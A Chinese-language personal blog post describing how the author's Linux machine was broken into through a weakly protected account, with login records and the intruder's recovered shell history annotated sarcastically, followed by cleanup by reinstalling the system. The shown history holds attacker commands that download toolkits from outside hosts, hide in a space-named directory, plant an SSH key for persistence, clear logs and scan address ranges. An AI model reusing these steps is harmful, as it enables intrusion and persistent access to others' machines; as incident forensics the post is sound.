那就是。。。我的计算机被入侵了！

啥也不说了，发日志。

alex:~> last
alex     pts/1        :0.0             Fri Feb 13 19:05   still logged in   
alex     pts/0        :0.0             Fri Feb 13 18:40   still logged in   
alex     tty7         :0               Fri Feb 13 17:36   still logged in   
reboot   system boot  2.6.27-9-generic Fri Feb 13 17:25 - 19:05  (01:40)    
alex     pts/1        124.135.202.67   Fri Feb 13 14:26 - 14:50  (00:23)    
alex     pts/1        61.185.61.3      Fri Feb 13 12:15 - 13:07  (00:51)    
root     pts/0        :0.0             Fri Feb 13 12:06 - down   (04:40)    
alex     tty7         :0               Fri Feb 13 12:06 - down   (04:41)    
reboot   system boot  2.6.27-9-generic Fri Feb 13 12:04 - 16:47  (04:43)    
jack     pts/0        86.122.67.104    Sun Feb  1 19:04 - crash (11+16:59)  
root     pts/0        211.136.73.103   Sun Feb  1 17:52 - 17:57  (00:04)    
alex     pts/0        218.58.71.19     Sun Feb  1 13:21 - 13:26  (00:05)    

wtmp begins Sun Feb  1 13:21:07 2009


jack这个用户是给我爸爸用的，自然不是什么强密码。经查，86.122.67.104是个罗马尼亚的IP。

由于我用的是bash，有个文件帮了我的忙，那就是 .bash_history

看看他／她／它到底干了什么。

还是看看这些吧。

/home/jack/.:
总用量 148K
drwxr-xr-x 27 jack jack 4.0K 2009-01-31 20:44 .
drwxr-xr-x  5 root root 4.0K 2009-02-13 12:27 ..
-rw-------  1 jack jack  969 2009-02-01 21:19 .bash_history
-rw-r--r--  1 jack jack  220 2009-01-28 02:25 .bash_logout
-rw-r--r--  1 jack jack 3.1K 2009-01-28 02:25 .bashrc

另外一些令人发指的东西  。

alex:~> sudo cat /home/jack/.bash_history
[sudo] password for alex:
w ;算懂点，知道看看管理员在线不
cat /proc/cpuinfo
passwd ;有意思么？
w
id
ls -a
uname -a
cd /dev/shm
mkdir " " ;真无趣
cd " "
wget http://das.trei.ro/DaS.tgz
tar zxvf DaS.tgz
cd DaS
nano mech.set ;不会vi吧
nano 2
nano 3
nano 4
./- ;清日志？
cd ..
ls -a
w
cat /proc/cpuinfo
w
cat /proc/cpuinfo
cd ~
mkdir .ssh
cd .ssh
echo "ssh-rsa SOMETHING" >> authorized_keys ;没用了。
chmod 700 ~/.ssh;chmod 600 ~/.ssh/authorized_keys
cd /tmp
ls -a
wget www.especial.ucoz.com/a.jpg
tar xzvf a.jpg
rm -rf a.jpg
cd .r
ls -a
nano start
nano a
chmod +x *
ls -a
./a 210.230;./a 210.231;./a 210.232;./a 210.233;./a 210.234;./a 210.235;./a 210.236;./a 210.237;./a 210.238;./a 210.239;./a 210.240;./a 210.241;./a 210.242;./a 210.243;./a 210.244;./a 210.245;./a 210.246;./a 210.247;./a 210.248;./a 210.249 ;增加自己的IP不用登录？不大可能，一回看看到底是啥玩意。
w
ps x
w
ps x
cd /tmp
ls -a
cd .r
nano start
./screen
ls -a
screen
 

还有 。

alex:/home/jack> ls -laht
总用量 148K
drwxr-xr-x  5 root root 4.0K 2009-02-13 12:27 ..
-rw-------  1 jack jack  969 2009-02-01 21:19 .bash_history
drwx------  2 jack jack 4.0K 2009-01-31 20:45 .ssh
drwxr-xr-x 27 jack jack 4.0K 2009-01-31 20:44 .
 

大概明白了？

现在做善后工作：

下载Solaris 10/08光盘镜像；买了一个DVD刻录机，刻盘，拔掉被入侵的硬盘，换上另外一块安全硬盘，全新安装Solaris 10.

部署zone，配置服务